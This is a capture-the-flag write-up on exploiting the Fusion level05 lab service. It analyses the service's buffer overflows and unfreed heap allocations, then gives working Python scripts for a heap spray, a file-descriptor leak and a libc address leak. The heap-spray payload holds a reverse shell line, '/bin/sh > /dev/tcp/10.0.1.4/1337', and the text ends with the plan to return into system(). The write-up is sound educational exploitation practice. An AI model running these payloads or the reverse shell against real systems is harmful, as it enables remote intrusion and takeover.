Even more information leaks and stack overwrites. This time with random libraries / evented programming styles :>
The description and source code can be found here:
http://exploit.education/fusion/level05/
Source Code Analysis
At a high level, this program allows you to connect to the service and register users into a “database” (it’s just a global array variable). It also lets you send the “database” to a remote host, check names to see if they’ve been registered, and see which registered user is “up” on a port that you specify.
childtask()
This function simply handles each of the program’s available commands:
if (strncmp(buffer, "addreg ", 7) == 0) { taskcreate(addreg, strdup(buffer + 7), STACK); continue; } if (strncmp(buffer, "senddb ", 7) == 0) { taskcreate(senddb, strdup(buffer + 7), STACK); continue; } if (strncmp(buffer, "checkname ", 10) == 0) { struct isuparg *isa = calloc(sizeof(struct isuparg), 1); isa->fd = cfd; isa->string = strdup(buffer + 10); taskcreate(checkname, isa, STACK); continue; } if (strncmp(buffer, "quit", 4) == 0) { break; } if (strncmp(buffer, "isup ", 5) == 0) { struct isuparg *isa = calloc(sizeof(struct isuparg), 1); isa->fd = cfd; isa->string = strdup(buffer + 5); taskcreate(isup, isa, STACK); }
addreg()
This function lets you register users into a “database” by supplying the command, name, flags (as an integer), and IPv4 address.
static void addreg(void *arg) { char *name, *sflags, *ipv4, *p; int h, flags; char *line = (char *)(arg); name = line; p = strchr(line, ' '); if (! p) goto bail; *p++ = 0; sflags = p; p = strchr(p, ' '); if (! p) goto bail; *p++ = 0; ipv4 = p; flags = atoi(sflags); if (flags & ~0xe0) goto bail; h = hash(name, strlen(name), REGDB-1); registrations[h].flags = flags; registrations[h].ipv4 = inet_addr(ipv4); printf("registration added successfully\n"); bail: free(line); }
The program performs a check on the “flag” integer you supply. It quits and nothing happens if you don’t supply one of the following values: 0, 32, 64, 96, 128, 160, 192, 224. There doesn’t seem to be any reason for this and the flag integer doesn’t seem to be used in any meaningful way.
The name supplied is “hashed” with their own custom 7-bit hashing algorithm. That hash is then used as the index for where to save the flags and IPv4 address in the registrations[]
array.
An example of using the addreg
command:
andrew ~ $ nc fusion 20005 addreg Andrew 32 10.0.1.4
senddb()
This function has an overflow vulnerability that I will later realize isn’t necessary for exploiting this program. So feel free to skip this section entirely. However, I’ll leave it in for shits & giggles…
static void senddb(void *arg) { unsigned char buffer[512], *p; char *host, *l; char *line = (char *)(arg); int port; int fd; int i; int sz; p = buffer; sz = sizeof(buffer); host = line; l = strchr(line, ' '); if (! l) goto bail; *l++ = 0; port = atoi(l); if (port == 0) goto bail; printf("sending db\n"); if ((fd = netdial(UDP, host, port)) < 0) goto bail; for (sz = 0, p = buffer, i = 0; i < REGDB; i++) { if (registrations[i].flags | registrations[i].ipv4) { memcpy(p, ®istrations[i], sizeof(struct registrations)); p += sizeof(struct registrations); sz += sizeof(struct registrations); } } bail: fdwrite(fd, buffer, sz); close(fd); free(line); }
The for loop will copy the data from each element of the registrations[]
array into the buffer[512]
array. The registrations[]
array is capable of holding up to 128 elements of the registrations
struct, which was defined globally earlier:
struct registrations { short int flags; in_addr_t ipv4; } __attribute__((packed)); #define REGDB (128) struct registrations registrations[REGDB];
Since the struct was given the packed
attribute, it will only use as much space as needed, which happens to be 6 bytes. Two bytes for the short int and 4 for the in_addr_t. A little math will tell us that the filling the registrations[]
array will take 768 bytes (6 * 128). That’s 256 bytes more than the buffer[512]
array.
I wrote a short script as a proof of concept:
#!/usr/bin/env python3 from pwn import * import time import string import random def random_string(size): return ''.join(random.choice(string.ascii_letters) for x in range(size)) io = remote("fusion", 20005) local_ip = "10.0.1.4" local_port = 4444 log.info("Sending 'addreg' commands") for i in range(170): io.sendline(f"addreg {random_string(32)} 32 17.17.17.17") time.sleep(0.1) log.info("Sending 'senddb' command") senddb = f"senddb {local_ip} {local_port}\n" io.send(senddb) io.close()
Running this script from the attacking VM takes about 20 seconds because of the 0.1 second sleep between each command. Without this, I noticed that a bunch of the commands would be bunched into a single packet and the buffer wasn’t being overflown.
andrew ~/level05 $ ./bof.py [+] Opening connection to fusion on port 20005: Done [*] Sending 'addreg' commands [*] Sending 'senddb' command [*] Closed connection to fusion port 20005
On the Fusion VM, we can see the segfault in the kernel messages:
fusion@fusion:~$ dmesg ... [ 2446.051965] level05[1878]: segfault at 20110d ip b764d90e sp b8ff695c error 4 in libc-2.13.so[b75db000+176000]
Hash
I need to have a list of strings I can use for the “name” field and their hashed value. I’ll need to be able to place data in certain places of the overflown buffer. In order to do that, I’ll need to know which index in the registrations[]
array I have to work with. I re-wrote the hashing algorithm in a Python script and created a loop to hash a bunch of 2-character strings and print the results.
#!/usr/bin/env python3 import string import sys def hash(string): mask = 127 h = 0xfee13117 max_int = 0xffffffff for i in range(len(string)): h ^= ord(string[i]) h += (h << 11) h &= max_int h ^= (h >> 7) h -= ord(string[i]) h += (h << 3) h &= max_int h ^= (h >> 10) h += (h << 15) h &= max_int h -= (h >> 17) return (h & mask) if __name__ == "__main__": all_chars = string.ascii_letters + string.digits #+ string.punctuation for i in range(len(all_chars)): for j in range(len(all_chars)): string = all_chars[i] + all_chars[j] h = hash(string, len(string)) print(f"{h}\t{string}")
checkname()
There exists another buffer overflow in the get_and_hash()
function, which is called by checkname()
.
int get_and_hash(int maxsz, char *string, char separator) { char name[32]; int i; if (maxsz > 32) return 0; for (i = 0; i < maxsz, string[i]; i++) { if (string[i] == separator) break; name[i] = string[i]; } return hash(name, strlen(name), 0x7f); } struct isuparg { int fd; char *string; }; static void checkname(void *arg) { struct isuparg *isa = (struct isuparg *)(arg); int h; h = get_and_hash(32, isa->string, '@'); fdprintf(isa->fd, "%s is %sindexed already\n", isa->string, registrations[h].ipv4 ? "" : "not "); }
The checkname()
function takes the string the user supplied after the “checkname ” command and sends it to the get_and_hash()
function. It looks like the intention is to loop through each character of that string, save it to the name[32]
variable, and stop when either the supplied string ends or it reaches the maximum size of 32.
Except, that’s not how this works. Admittedly, it took me a long time to spot this myself as I’m not a C developer. The comma operator in the for loop says to keep looping whle The comma operator in the for loop returns only the last value of the expression, so it will ignore i
is less than maxsz
OR while string[i]
exists.maxsz
and keep looping while string[i]
exists.
We can test this out by sending the “checkname” command followed by a string that we know will overflow the buffer and overwrite the saved EIP pointer.
andrew ~/level05 $ python3 -c 'print("checkname " + "A"*50)' | nc fusion 20005 ** welcome to level05 **
The dmesg
command on the Fusion VM will show that we have full control over the EIP register.
fusion@fusion ~ $ dmesg [10664.771069] level05[3230]: segfault at 41414141 ip 41414141 sp b929ebb0 error 14
This, alone, will not do much for us as everything is randomized. Even the addresses of the code is random as it’s a Position Independent Executable. But we’ll see later how this can be used.
Note that the get_and_hash()
function does NOT null-terminate the name[]
string. Because data is already on the stack, the name passed to the hash()
function is rarely the same as what the user submitted. So usually, you’ll get the message that “
isup()
The “isup” command takes 2 arguments (for some reason), almost anything is possible for the first and a valid port number for the second. It simply goes through all the registered “names” in its database and attempts to connect to them via UDP on the port that was specified. If the host is listening on the specified port, then the server sends it part of its registration info.
static void isup(void *arg) { unsigned char buffer[512], *p; char *host, *l; struct isuparg *isa = (struct isuparg *)(arg); int port; int fd; int i; int sz; // skip over first arg, get port l = strchr(isa->string, ' '); if (! l) return; *l++ = 0; port = atoi(l); host = malloc(64); for (i = 0; i < 128; i++) { p = (unsigned char *)(& registrations[i]); if (! registrations[i].ipv4) continue; sprintf(host, "%d.%d.%d.%d", (registrations[i].ipv4 >> 0) & 0xff, (registrations[i].ipv4 >> 8) & 0xff, (registrations[i].ipv4 >> 16) & 0xff, (registrations[i].ipv4 >> 24) & 0xff); if ((fd = netdial(UDP, host, port)) < 0) { continue; } buffer[0] = 0xc0; memcpy(buffer + 1, p, sizeof(struct registrations)); buffer[5] = buffer[6] = buffer[7] = 0; fdwrite(fd, buffer, 8); close(fd); } free(host); }
Something important to note is that before the call to isup()
(take a look back at the childtask()
function), the buffer variable that contains the user-supplied data is put through strdup()
, which will allocate space for it on the heap. However, the pointer that’s returned from that never get’s freed.
Exploitation
Heap Spraying
Because memory in the heap is not properly freed after being allocated with the “isup” command, we can fill the heap with our own data. We will then overwrite the isa->fd
pointer in the checkname()
function and try to get it to point to somewhere in the heap (more on that later). We’ll need to include a string that can get us a reverse shell to pass as an argument to system()
as well as the value for the file descriptor, which happens to always be 0x4. That allows the program to send data back to us. Since this is filling a 32 bit integer space, there will be some null bytes involved, which means it’ll need to be at the end of our data.
We’ll need to get an idea for where the heap base address may be and where it could possibly end. The more data we fill the heap with, the better of a chance we’ll have of finding a valid address later. However, we don’t need to fill it up completely, so we’ll try to be smart about it.
Some of the processes had heap space starting with 0x0 instead of 0xb. Our “level05” process (and all the other levels) always start with 0xb:
root ~ # cat /proc/$(pidof level05)/maps b7648000-b768a000 rw-p 00000000 00:00 0 b768a000-b7800000 r-xp 00000000 07:00 92669 /lib/i386-linux-gnu/libc-2.13.so b7800000-b7802000 r--p 00176000 07:00 92669 /lib/i386-linux-gnu/libc-2.13.so b7802000-b7803000 rw-p 00178000 07:00 92669 /lib/i386-linux-gnu/libc-2.13.so b7803000-b7806000 rw-p 00000000 00:00 0 b7810000-b7812000 rw-p 00000000 00:00 0 b7812000-b7813000 r-xp 00000000 00:00 0 [vdso] b7813000-b7831000 r-xp 00000000 07:00 92553 /lib/i386-linux-gnu/ld-2.13.so b7831000-b7832000 r--p 0001d000 07:00 92553 /lib/i386-linux-gnu/ld-2.13.so b7832000-b7833000 rw-p 0001e000 07:00 92553 /lib/i386-linux-gnu/ld-2.13.so b7833000-b7839000 r-xp 00000000 07:00 75280 /opt/fusion/bin/level05 b7839000-b783a000 rw-p 00006000 07:00 75280 /opt/fusion/bin/level05 b783a000-b783d000 rw-p 00000000 00:00 0 b9270000-b9291000 rw-p 00000000 00:00 0 [heap] bfb7d000-bfb9e000 rw-p 00000000 00:00 0 [stack]
Let’s look at the heap space addresses for the various processes on the Fusion VM:
root ~ # cat /proc/*/maps | grep heap | grep ^b | sort b7815000-b7836000 rw-p 00000000 00:00 0 [heap] b7b7c000-b7b9d000 rw-p 00000000 00:00 0 [heap] b7d46000-b7d67000 rw-p 00000000 00:00 0 [heap] b7d46000-b7d67000 rw-p 00000000 00:00 0 [heap] b7d46000-b7d67000 rw-p 00000000 00:00 0 [heap] b7d67000-b7d88000 rw-p 00000000 00:00 0 [heap] b7d67000-b7d88000 rw-p 00000000 00:00 0 [heap] b7d67000-b7da7000 rw-p 00000000 00:00 0 [heap] b7e4c000-b7e6d000 rw-p 00000000 00:00 0 [heap] b7e90000-b7ed7000 rw-p 00000000 00:00 0 [heap] b82b7000-b82d8000 rw-p 00000000 00:00 0 [heap] b8336000-b8357000 rw-p 00000000 00:00 0 [heap] b837f000-b83a0000 rw-p 00000000 00:00 0 [heap] b8ae1000-b8b44000 rw-p 00000000 00:00 0 [heap] b8e0b000-b8e46000 rw-p 00000000 00:00 0 [heap] b8e0b000-b8e46000 rw-p 00000000 00:00 0 [heap] b8e32000-b8e53000 rw-p 00000000 00:00 0 [heap] b9270000-b9291000 rw-p 00000000 00:00 0 [heap] b9647000-b9668000 rw-p 00000000 00:00 0 [heap]
We can see that it generally ranges between 0xb7815000 and 0xb9668000 (lowest address to highest address), the difference of which is 0x1e53000. That’s 31,797,248 in decimal. The childtask()
function stores each command into a buffer with a maximum size of 512 bytes. In addition, you’ll see later that another 16 bytes of heap space is taken up to store the file descriptor each time. This means we’d need to send the “isup” command (the one we’re using for heap spraying) 60,222 times (31,797,248 ÷ (512 + 16)). Let’s take a look at what the heap looks like when we send data. FIrst, I’ll attach to the “level05” process from the Fusion VM using gdbserver
:
root ~ # gdbserver --attach :1234 $(pidof level05) Attached; pid = 4819 Listening on port 1234
Then I’ll connect to it from GDB on my attacking VM (note that I copied the level05 binary to my attacking machine so that I could have GDB read the symbols):
andrew ~/level05 $ gdb GEF for linux ready, type `gef' to start, `gef config' to configure 92 commands loaded for GDB 9.2 using Python engine 3.8 gef➤ file level05 Reading symbols from level05... gef➤ target remote 10.0.1.5:1234 Remote debugging using 10.0.1.5:1234 ... gef➤ c Continuing.
Now I’ll send some data:
andrew ~/level05 $ echo "isup $(pwn cyclic 512)" | nc fusion 20005 ** welcome to level05 **
And check the heap:
^C Program received signal SIGINT, Interrupt. ... gef➤ heap chunks Chunk(addr=0xb91fd008, size=0x108, flags=PREV_INUSE) [0xb91fd008 08 b0 5c b7 10 d1 1f b9 b0 54 20 b9 60 da 20 b9 ..\......T .`. .] Chunk(addr=0xb91fd110, size=0x83a0, flags=PREV_INUSE) [0xb91fd110 66 64 74 61 73 6b 00 00 00 00 00 00 00 00 00 00 fdtask..........] Chunk(addr=0xb92054b0, size=0x83a0, flags=PREV_INUSE) [0xb92054b0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................] Chunk(addr=0xb920d850, size=0x10, flags=PREV_INUSE) [0xb920d850 04 00 00 00 60 d8 20 b9 00 00 00 00 01 02 00 00 ....`. .........] Chunk(addr=0xb920d860, size=0x200, flags=PREV_INUSE) [0xb920d860 61 61 61 61 62 61 61 61 63 61 61 61 64 61 61 61 aaaabaaacaaadaaa] Chunk(addr=0xb920da60, size=0x105a8, flags=PREV_INUSE) ← top chunk gef➤ x/128wx 0xb920d860 0xb920d860: 0x61616161 0x61616162 0x61616163 0x61616164 0xb920d870: 0x61616165 0x61616166 0x61616167 0x61616168 0xb920d880: 0x61616169 0x6161616a 0x6161616b 0x6161616c 0xb920d890: 0x6161616d 0x6161616e 0x6161616f 0x61616170 0xb920d8a0: 0x61616171 0x61616172 0x61616173 0x61616174 0xb920d8b0: 0x61616175 0x61616176 0x61616177 0x61616178 0xb920d8c0: 0x61616179 0x6261617a 0x62616162 0x62616163 0xb920d8d0: 0x62616164 0x62616165 0x62616166 0x62616167 0xb920d8e0: 0x62616168 0x62616169 0x6261616a 0x6261616b 0xb920d8f0: 0x6261616c 0x6261616d 0x6261616e 0x6261616f 0xb920d900: 0x62616170 0x62616171 0x62616172 0x62616173 0xb920d910: 0x62616174 0x62616175 0x62616176 0x62616177 0xb920d920: 0x62616178 0x62616179 0x6361617a 0x63616162 0xb920d930: 0x63616163 0x63616164 0x63616165 0x63616166 0xb920d940: 0x63616167 0x63616168 0x63616169 0x6361616a 0xb920d950: 0x6361616b 0x6361616c 0x6361616d 0x6361616e 0xb920d960: 0x6361616f 0x63616170 0x63616171 0x63616172 0xb920d970: 0x63616173 0x63616174 0x63616175 0x63616176 0xb920d980: 0x63616177 0x63616178 0x63616179 0x6461617a 0xb920d990: 0x64616162 0x64616163 0x64616164 0x64616165 0xb920d9a0: 0x64616166 0x64616167 0x64616168 0x64616169 0xb920d9b0: 0x6461616a 0x6461616b 0x6461616c 0x6461616d 0xb920d9c0: 0x6461616e 0x6461616f 0x64616170 0x64616171 0xb920d9d0: 0x64616172 0x64616173 0x64616174 0x64616175 0xb920d9e0: 0x64616176 0x64616177 0x64616178 0x64616179 0xb920d9f0: 0x6561617a 0x65616162 0x65616163 0x65616164 0xb920da00: 0x65616165 0x65616166 0x65616167 0x65616168 0xb920da10: 0x65616169 0x6561616a 0x6561616b 0x6561616c 0xb920da20: 0x6561616d 0x6561616e 0x6561616f 0x65616170 0xb920da30: 0x65616171 0x65616172 0x65616173 0x65616174 0xb920da40: 0x65616175 0x65616176 0x65616177 0x65616178 0xb920da50: 0x65616179 0x6661617a 0x00616162 0x000105a9
The last full word value here (without a space) is 0x6661617a. We’ll find the offset of that and add our 0x4 value afterward in the heap spray script:
andrew ~/level05 $ pwn cyclic -l 0x6661617a 500
That means we can put 504 characters of padding (the 500 number does not include the 4 characters of the last full word value) in the buffer before our file descriptor value. Here’s a script I came up with for spraying the heap:
#!/usr/bin/env python3 from pwn import * from time import sleep buff_sz = 504 command = b"isup " content = b"ABC " content += b"/bin/sh > /dev/tcp/10.0.1.4/1337 0>&1 2>&1; " # 44 bytes content += b"A" * (buff_sz - len(content)) content += pack(4) io = remote("fusion", 20005) log.info(io.recvline()) max_spray = 60222 with log.progress('Spraying') as p: for i in range(max_spray): io.send(command + content) p.status(f"{(i/max_spray):.2%}") sleep(0.005)
A couple of notes:
- The “content” variable starts with “
ABC
” because the first space in our content will get turned into a null byte. We can’t have that happen in the middle of our reverse shell string. Also I needed a unique value, like “ABC”, later on when I’m checking the returned data. - I need to add that small sleep value because without it, some of the requests get lumped together into a single packet. If that happens, only the first request is valid and the rest are ignored.
Running the script takes about 8 minutes:
andrew ~/level05 $ time ./3_spray.py [+] Opening connection to fusion on port 20005: Done [*] ** welcome to level05 ** [+] Spraying: Done real 8m17.777s user 0m21.451s sys 1m28.634s
Leaking the File Descriptor
Now that we’ve got the heap filled with data, we can look at the addresses there and try to find a pattern to make our address guessing a bit smarter:
gef➤ heap chunks Chunk(addr=0xb8759008, size=0x108, flags=PREV_INUSE) [0xb8759008 08 b0 60 b7 10 91 75 b8 b0 14 76 b8 70 9c 76 b8 ..`...u...v.p.v.] Chunk(addr=0xb8759110, size=0x83a0, flags=PREV_INUSE) [0xb8759110 66 64 74 61 73 6b 00 00 00 00 00 00 00 00 00 00 fdtask..........] Chunk(addr=0xb87614b0, size=0x83a0, flags=PREV_INUSE) [0xb87614b0 30 64 7c b7 30 64 7c b7 00 00 00 00 00 00 00 00 0d|.0d|.........] Chunk(addr=0xb8769850, size=0x10, flags=) [0xb8769850 04 00 00 00 60 98 76 b8 00 00 00 00 01 02 00 00 ....`.v.........] Chunk(addr=0xb8769860, size=0x200, flags=PREV_INUSE) [0xb8769860 41 41 41 00 2f 62 69 6e 2f 73 68 20 3e 20 2f 64 AAA./bin/sh > /d] Chunk(addr=0xb8769a60, size=0x10, flags=PREV_INUSE) [0xb8769a60 04 00 00 00 70 9a 76 b8 00 00 00 00 01 02 00 00 ....p.v.........] Chunk(addr=0xb8769a70, size=0x200, flags=PREV_INUSE) [0xb8769a70 41 41 41 00 2f 62 69 6e 2f 73 68 20 3e 20 2f 64 AAA./bin/sh > /d] ...
We can see that the address of each chunk is 16-byte aligned and ends with 0.
Let’s look at the contents of a single chunk:
gef➤ x/128wx 0xb8769860 0xb8769860: 0x00414141 0x6e69622f 0x2068732f 0x642f203e 0xb8769870: 0x742f7665 0x312f7063 0x2e302e30 0x2f342e31 0xb8769880: 0x37333331 0x263e3020 0x3e322031 0x203b3126 0xb8769890: 0x41414141 0x41414141 0x41414141 0x41414141 0xb87698a0: 0x41414141 0x41414141 0x41414141 0x41414141 0xb87698b0: 0x41414141 0x41414141 0x41414141 0x41414141 0xb87698c0: 0x41414141 0x41414141 0x41414141 0x41414141 0xb87698d0: 0x41414141 0x41414141 0x41414141 0x41414141 0xb87698e0: 0x41414141 0x41414141 0x41414141 0x41414141 0xb87698f0: 0x41414141 0x41414141 0x41414141 0x41414141 0xb8769900: 0x41414141 0x41414141 0x41414141 0x41414141 0xb8769910: 0x41414141 0x41414141 0x41414141 0x41414141 0xb8769920: 0x41414141 0x41414141 0x41414141 0x41414141 0xb8769930: 0x41414141 0x41414141 0x41414141 0x41414141 0xb8769940: 0x41414141 0x41414141 0x41414141 0x41414141 0xb8769950: 0x41414141 0x41414141 0x41414141 0x41414141 0xb8769960: 0x41414141 0x41414141 0x41414141 0x41414141 0xb8769970: 0x41414141 0x41414141 0x41414141 0x41414141 0xb8769980: 0x41414141 0x41414141 0x41414141 0x41414141 0xb8769990: 0x41414141 0x41414141 0x41414141 0x41414141 0xb87699a0: 0x41414141 0x41414141 0x41414141 0x41414141 0xb87699b0: 0x41414141 0x41414141 0x41414141 0x41414141 0xb87699c0: 0x41414141 0x41414141 0x41414141 0x41414141 0xb87699d0: 0x41414141 0x41414141 0x41414141 0x41414141 0xb87699e0: 0x41414141 0x41414141 0x41414141 0x41414141 0xb87699f0: 0x41414141 0x41414141 0x41414141 0x41414141 0xb8769a00: 0x41414141 0x41414141 0x41414141 0x41414141 0xb8769a10: 0x41414141 0x41414141 0x41414141 0x41414141 0xb8769a20: 0x41414141 0x41414141 0x41414141 0x41414141 0xb8769a30: 0x41414141 0x41414141 0x41414141 0x41414141 0xb8769a40: 0x41414141 0x41414141 0x41414141 0x41414141 0xb8769a50: 0x41414141 0x41414141 0x00000004 0x00000011
The file descriptor that we included at the end (0x00000004
) will always have an address ending with 8.
Let’s look at the tail end of the disassembly (from Ghidra) for the get_and_hash()
function:
000127ab ADD ESP, 0x2c 000127ae POP ESI 000127af POP EDI 000127b0 POP EBP 000127b1 RET
The stack includes 44 bytes (0x2c) of space, followed by saved values for the ESI, EDI, EBP, and EIP registers. Once execution is returned to the checkname()
function, a few things happen but we’ll see what happens to the value in the ESI register before fdprintf()
is called:
0001282b MOV EAX, dword ptr [ESI] 0001282d MOV dword ptr [ESP], EAX 00012830 CALL fdprintf
It gets saved to the top of the stack as the first argument to fdprintf()
. This tells us that it’s the pointer to the file descriptor.
Now, I’ll write a script to find a valid file descriptor address in our heap space.
#!/usr/bin/env python3 from pwn import * import sys start_addr = 0xb9700108 content = b"checkname " content += b"A" * 32 io = remote("fusion", 20005) log.info(io.recvline()) log.info("Sending 'checkname' commands") for addr in range(start_addr, start_addr+528, 16): io.sendline(content + p32(addr)) data = io.recvline(timeout=0.1) if b"indexed already" in data: log.success(f"Found address = {addr:#010x}") log.info(f"Reverse shell string should be at {addr+28:#010x}") sys.exit() log.warning("File descriptor address not found!")
Choosing the address to start guessing with (line 8) can be tricky. If it’s outside the heap and it’s an invalid address, the program will crash and we’ll need to start over again by spraying the heap. I chose that starting address (0xb9700108
) because I looked at all the heap starting addresses for the other processes on the system and didn’t see any that start above that, so it should be safe. I also know that with the amount of data we’re spraying the heap with, it’s not too high to go above the allocated heap space. AND I know that the file descriptor address will always end with 8.
You can see that the for loop will only run through 33 times (528 ÷ 16). That should be the maximum number of guesses needed to find the file descriptor.
andrew ~/level05 $ ./leak_fd.py [+] Opening connection to fusion on port 20005: Done [*] ** welcome to level05 ** [*] Sending 'checkname' commands [+] File descriptor address = 0xb9700208 [*] Reverse shell string should be at 0xb9700224
Leaking a Libc Address
The goal here is to call the system()
function from libc and pass it a pointer to our reverse shell string. In order to get this address, we would normally leak it’s address from the .got.plt section. This is how the program knows where the various libc (and other shared libraries) functions are stored at. However, the system()
function is never called in this binary, so it is not mapped in the .got.plt section. We’ll need to leak another function’s address and calculate the offset from that to system()
. In this case, I’ll be leaking the write()
function’s address.
First, I’m going to find the system()
and write()
offsets:
# readelf -s /lib/i386-linux-gnu/libc-2.13.so | grep -E ' system@| write@' 1409: 0003cb20 139 FUNC WEAK DEFAULT 12 system@@GLIBC_2.0 2247: 000c12c0 128 FUNC WEAK DEFAULT 12 write@@GLIBC_2.0
A little hex math tells us that 0xc12c0 – 0x3cb20 = 0x847a0. So, whichever address we find for write()
, we just need to subtract 0x847a0 from it in order to get the system()
function address.
The only reason this exploit will work is because the heap contains a few addresses to functions in our code, presumably because the chunk is not properly free’d. Let’s look for those. The steps I’m taking here:
- Print the address of the
childtask()
function - Search for that address in memory
- Show the heap chunks (NOTE: If you do this after spraying the heap, it will take a LONG time and try to display ALL of the chunks. Hit Ctrl+C immediately after using the
heap chunks
command to get just the first few.) - Get the difference of the address of the start of my heap spraying and the
childtask()
pointer location - Divide that difference by 4
- Use the
dereference
command to show the last 34 word values of that large chunk before our heap spraying
gef➤ p childtask $1 = {void (void *)} 0xb78d9c70 <childtask> gef➤ search-pattern 0xb78d9c70 [+] Searching '\x70\x9c\x8d\xb7' in memory [+] In (0xb76ed000-0xb772f000), permission=rw- 0xb772d130 - 0xb772d140 → "\x70\x9c\x8d\xb7[...]" [+] In '[heap]'(0xb8c14000-0xb8c35000), permission=rw- 0xb8c1c6ec - 0xb8c1c6fc → "\x70\x9c\x8d\xb7[...]" 0xb8c1c840 - 0xb8c1c850 → "\x70\x9c\x8d\xb7[...]" 0xb8c247c8 - 0xb8c247d8 → "\x70\x9c\x8d\xb7[...]" gef➤ heap chunks Chunk(addr=0xb8c14008, size=0x108, flags=PREV_INUSE) [0xb8c14008 08 d0 6e b7 10 41 c1 b8 b0 c4 c1 b8 a0 4e c2 b8 ..n..A.......N..] Chunk(addr=0xb8c14110, size=0x83a0, flags=PREV_INUSE) [0xb8c14110 66 64 74 61 73 6b 00 00 00 00 00 00 00 00 00 00 fdtask..........] Chunk(addr=0xb8c1c4b0, size=0x83a0, flags=PREV_INUSE) [0xb8c1c4b0 98 4e c2 b8 30 84 8a b7 00 00 00 00 00 00 00 00 .N..0...........] Chunk(addr=0xb8c24850, size=0x10, flags=) [0xb8c24850 04 00 00 00 60 48 c2 b8 00 00 00 00 01 02 00 00 ....`H..........] Chunk(addr=0xb8c24860, size=0x200, flags=PREV_INUSE) [0xb8c24860 41 42 43 00 2f 62 69 6e 2f 73 68 20 3e 20 2f 64 ABC./bin/sh > /d] ... gef➤ p/d 0xb8c24850 - 0xb8c247c8 $2 = 136 gef➤ p/d 136 / 4 $3 = 34 gef➤ dereference 0xb8c247c8 34 0xb8c247c8│+0x0000: 0xb78d9c70 → <childtask+0> push ebp 0xb8c247cc│+0x0004: 0xb8c1c72c → 0x00000000 0xb8c247d0│+0x0008: 0xb78e160c → 0x00000000 0xb8c247d4│+0x000c: 0xb776c629 → <swapcontext+89> pop ebx 0xb8c247d8│+0x0010: 0x00000002 0xb8c247dc│+0x0014: 0xb78dc349 → <taskswitch+41> test eax, eax 0xb8c247e0│+0x0018: 0xb8c1c6c0 → 0x00000000 0xb8c247e4│+0x001c: 0xb78e15a0 → 0x00000000 0xb8c247e8│+0x0020: 0x00000000 0xb8c247ec│+0x0024: 0x00000000 0xb8c247f0│+0x0028: 0x00000000 0xb8c247f4│+0x002c: 0x00000000 0xb8c247f8│+0x0030: 0xb78dc380 → <taskstart+0> sub esp, 0x1c 0xb8c247fc│+0x0034: 0xb776c5ab → <makecontext+75> lea esp, [esp+ebx*4] 0xb8c24800│+0x0038: 0x00000000 0xb8c24804│+0x003c: 0x00000000 ...
You can see there’s a couple of other function addresses in here, there’s no particular reason to use childtask()
over the others.
Next, I’ll need to find the offset of the wite@got.plt
location from where the pointer to childtask()
is. I’ll first ask GDB to print the address of write()
in libc and search memory for that address. This will be the location in the .got.plt section that stores its location. Then we just subtract the location of childtask()
from the write()
address stored in .got.plt to find the offset. We can use this offset because the heap contains a pointer to childtask()
and is always at the same location (near the beginning of the heap):
gef➤ p write $1 = {<text variable, no debug info>} 0xb76382c0 <write> gef➤ search-pattern 0xb76382c0 [+] Searching '\xc0\x82\x63\xb7' in memory [+] In '/opt/fusion/bin/level05'(0xb7726000-0xb7727000), permission=rw- 0xb77261a8 - 0xb77261b8 → "\xc0\x82\x63\xb7[...]" gef➤ p childtask $2 = {void (void *)} 0xb7721c70 <childtask> gef➤ p 0xb77261a8 - 0xb7721c70 $3 = 0x4538
This offset value will be the same each time the program is loaded into memory.
In summary, we’ll need to:
- Find
childtask()
pointer stored in the heap - Find the
write()
function address stored in the .got.plt section - Calculate the address to
system()
Here’s the script I wrote to find the childtask()
pointer in the heap and display the required addresses.
#!/usr/bin/env python3 from pwn import * import time import sys ################## FD = 0xb97001b0 # Use the address found from leaking the file descriptor ################## bad_chars = [b'\0', b'\x0a', b'\x0d', b'\x40'] content = b"checkname " content += b"A" * 32 align = 0x860 #context.log_level = 'DEBUG' def send(read_ptr): payload = content payload += p32(FD) payload += p32(read_ptr) io.sendline(payload) return io.recvline(timeout=0.1) def bad(addr): if any(bad in p32(addr) for bad in bad_chars): return True else: return False if bad(FD): log.error("File descriptor address contains a bad byte.") io = remote("fusion", 20005) log.info(io.recvline()) read = ((FD - align - 1) & 0xfffff000) + align # Keep track of when the previous address contained a bad byte prev_bad = False log.info("Searching...") while read > 0xb7000000: if bad(read): #log.failure(f"Bad byte found in address {read:#010x}") prev_bad = True read -= 0x1000 continue time.sleep(0.005) data = send(read) if not data: log.error("No data received. Either the program crashed or you have a bad file descriptor address.") elif data[:3] == b"ABC": prev_inuse = send(read - 24) if prev_inuse[:2] == b"\xa0\x83": # childtask() ptr offset from start of user-supplied heap = -136 bytes childtask_str = send(read - 136) childtask = unpack(childtask_str[:4]) write_str = send(childtask + 0x4538) write_addr = unpack(write_str[:4]) log.info(f"Last address read: {read-136:#010x}") log.success(f"Found address to childtask(): {childtask:#010x}") log.success(f" The write@got.plt address: {(childtask+0x4538):#010x}") log.success(f" The address to write() is: {write_addr:#010x}") log.success(f" The address to system() is: {(write_addr-0x847a0):#010x}") break elif data == b" is not indexed already\n" and prev_bad: log.failure(f"The last address read ({read+0x1000:#010x}) contained a bad byte and now we've hit a null region.\n" "The pointer to childtask() may be unreadable if its address has one or more bad bytes in it." "It is recommended to crash the program so you can start over.") log.warning("NOTE: You will need to spray the heap again") crash = input("Crash the program? [Y/n] ") if crash.lower() == "n": log.failure("Exiting") sys.exit(1) else: log.warning("OK, crashing the program") io.sendline(content + b"A"*12) sys.exit(1) elif data == b" is not indexed already\n" and not prev_bad: log.failure("We've hit a null region. Something went wrong.") log.info(f"Last address read: {read+0x1000:#010x}") sys.exit(1) read -= 0x1000 prev_bad = False
This went through a lot of trial-and-error and there’s probably a better way of doing it than this. But it works.
andrew ~/level05 $ ./find_system.py
[+] Opening connection to fusion on port 20005: Done
[*] ** welcome to level05 **
[*] Searching…
[*] Last address read: 0xb876f7d8
[+] Found address to childtask(): 0xb7876c70
[+] The write@got.plt address: 0xb787b1a8
[+] The address to write() is: 0xb778d2c0
[+] The address to system() is: 0xb7708b20
Getting A Reverse Shell
Now that we have the address to the system()
function, We can use the buffer overflow in the get_and_hash()
function to take control of the program and execute our reverse shell string. It’s as simple as overwriting the saved EIP register on the stack with the address to system()
and and supplying it with the address to our reverse shell string as an argument.
